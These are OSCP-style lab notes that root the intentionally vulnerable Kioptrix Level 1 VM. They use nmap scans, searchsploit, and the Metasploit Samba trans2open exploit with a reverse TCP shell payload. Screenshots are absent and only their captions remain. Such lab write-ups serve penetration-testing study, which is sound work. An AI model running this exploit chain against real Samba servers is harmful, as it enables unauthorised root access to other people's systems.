Gaining Root with Metasploit

Platform: Kali Linux, Kioptrix Level 1

1. Find the IP of Kioptirx

nmap -n -sP -sn

OSCP Learning Notes - Exploit(1)_OSCP

2. Scan the Kioptrix server and analyst the result.

nmap -nvv -Pn- -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN /root/kioptrix1_detailed.txt

OSCP Learning Notes - Exploit(1)_linux_02

3. Search samba exploit methods.

searchsploit samba 2.2

OSCP Learning Notes - Exploit(1)_linux_03

4. Open Metasploit.


OSCP Learning Notes - Exploit(1)_Kali Linux_04

5. Search and use the suitable module.

use exploit/linux/samba/trans2open

OSCP Learning Notes - Exploit(1)_OSCP_05

6. Set the metasploit options.

set rhost


OSCP Learning Notes - Exploit(1)_Kali Linux_06

7. Start the exploit but failed in the end.



OSCP Learning Notes - Exploit(1)_Kali Linux_07

8. Set the payload and Try gain.

set payload generic/shell_reverse_tcp


OSCP Learning Notes - Exploit(1)_Kali Linux_08

 Root the target server.

OSCP Learning Notes - Exploit(1)_Kali Linux_09


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